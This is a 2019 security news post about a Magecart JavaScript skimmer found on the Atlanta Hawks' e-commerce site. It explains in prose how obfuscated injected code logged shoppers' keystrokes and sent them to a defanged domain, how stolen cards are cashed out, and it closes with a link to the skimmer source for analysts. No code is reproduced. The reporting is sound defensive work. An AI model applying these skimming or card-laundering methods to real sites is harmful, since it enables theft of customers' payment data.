Magecart Strikes and Scores a 3-Pointer


By Vincent Ekeh | April 30, 2019


A collection of cyber criminals under the Magecart umbrella recently struck the online store of the NBA’s Atlanta Hawks. This Magecart group specializes in skimming credit card details from compromised eCommerce websites using a JavaScript injection attack. This attack joins the growing list of successful Magecart attacks in the last four years.

Magecart gained notoriety and made headlines in the past few years after a number of high-profile attacks on eCommerce sites. The first trace of Magecart malware was detected in March 2016. Among the ever-growing list of attacks was the October 2018 attack on twenty Magento extension, Ticketmaster UK, British Airways, NewEgg, Everlast, Faber and Faber.

This Atlanta Hawk’s breach was another high-profile attack from Magecart as their eCommerce site reportedly has over seven million hits per year. Sanguine security researchers found and reported that transactions on or after April 20th could have been compromised.  The threat actors appeared to have harvested names, addresses, and credit card details. They also traced this incident to a malicious domain imagesengines[.]com which was very recently registered (March 25, 2019).

To uncover this attack, the researchers built a Magecart detection tool which scans websites for telltale code. It found obfuscated JavaScript code on the Atlanta Hawk’s website. The researcher’s rendered it into a readable format and found instructions to log visitors’ keystrokes. Then, they checked its operation using Chrome Developer Tools. This is the developer console in the Chrome browser that shows website traffic. Alongside the regular requests targeting the website, they saw that it also sent the logged keystrokes to imagesengines[.]com.

Alarmingly, Magecart has had huge success on sites that run on the Adobe Magento Braintree extension to support payments via the Braintree platform.  The Atlanta Hawks’ hawksShop.com runs on Adobe’s Magento Commerce Cloud 2.2 e-commerce system. Other platforms targeted by the Magecart gangs are OpenCart, and the Powerfront CMS. Though Magento is quite secure, the researchers predict that the attackers gained entry to the shop’s core via an insecure third-party component vector like a database management tool, a marketing plugin or connected accounting software.

The number of affected customers is currently unknown, and the fate of the stolen credit card details is shrouded in uncertainty. Hackers monetize stolen credit card data by fraudulently purchasing goods and shipping them to associates in the US. This is a well-documented money laundering technique. Their U.S. employees, often unwittingly employed through work-from-home job scams, send the newly-purchased goods to other parts of the world where the criminals sell them on. They could also directly sell the stolen card details on the dark web.

The head count of Magecart affected websites sits upwards of 800, but, apart from the highly-publicized TicketMaster hack, this represents the first sports-related outlet that has been affected. From April 24 up untill the time of writing this report on April 28th, HawksShop.com was temporarily down for maintenance, presumably to fix this issue.

It is however unclear if this is the first skimmer code on HawksShop.com as researchers from RiskIQ claimed to have found traces of skimming codes on the site back far as June 6th, 2017. According to RiskIQ “The compromise wasn’t targeted however, it was one aimed at hundreds of websites at the same time.”

It is still unclear which group within Magecart is responsible for this latest attack, but our analysts speculate that it was Magecart Group 5 because of certain similarities to the 2018 Ticketmaster breach.

All thanks to Magecart for making sure that the Atlanta Hawks, who had one of the worst defenses in the 2018-2019 NBA season, had a similar hard time defending their eCommerce outlet.

Postscript:

For threat analysts, the Javascript skimmer.js code used for this attack can be found at https://gist.github.com/gwillem/1fffab4f8db513878454d86220545032

You must be logged in to post a comment Login